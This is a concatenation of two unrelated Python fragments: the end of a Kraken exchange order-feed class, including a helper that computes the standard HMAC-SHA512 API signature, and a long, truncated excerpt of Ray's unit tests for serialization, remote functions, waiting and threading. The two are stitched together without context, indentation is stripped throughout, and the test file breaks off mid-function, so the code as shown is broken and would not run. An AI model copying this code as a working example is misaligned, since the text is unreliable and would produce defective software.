def transform_order_data(self, message):
order_data_list = []
ts = time.time()
for dict in message[0]:
for order in dict:
                if ts - float(dict[order]['time']) < 10:  # only keep orders from the last 10 seconds
order_data = {
'id': dict[order]['ordertxid'],
'timestamp': int(float(dict[order]['time']) * 1000),
'lastTradeTimestamp': int(float(dict[order]['time']) * 1000),
'status': 'filled',
'symbol': self.NORMALIZED_SYMBOL[dict[order]['pair']],
'exchange': 'kraken',
'type': dict[order]['ordertype'],
'side': dict[order]['type'],
'price': float(dict[order]['price']),
'amount': float(dict[order]['vol'])
}
order_data_list.append(order_data)
return order_data_list
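# Illustrative sketch (hypothetical helper, unused by KrakenFeeder): the
# API-Sign computation from authenticate() unpacked into named steps. The
# signature is HMAC-SHA512, keyed with the base64-decoded API secret, over
# the URI path concatenated with SHA256(nonce + POST body), base64-encoded.
def _demo_api_sign(secret, path=b"/0/private/GetWebSocketsToken"):
    nonce = bytes(str(int(time.time() * 1000)), "utf-8")
    post_data = b"nonce=%s" % nonce
    message = path + hashlib.sha256(nonce + post_data).digest()
    signature = hmac.new(base64.b64decode(secret), message, hashlib.sha512)
    return nonce, base64.b64encode(signature.digest())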
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import string
import subprocess
import sys
import tempfile
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pickle
import pytest
import ray
import ray.test.cluster_utils
import ray.test.test_utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
}
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
    # release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=20, num_repeats=50):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(50):
num = 20
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(20)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
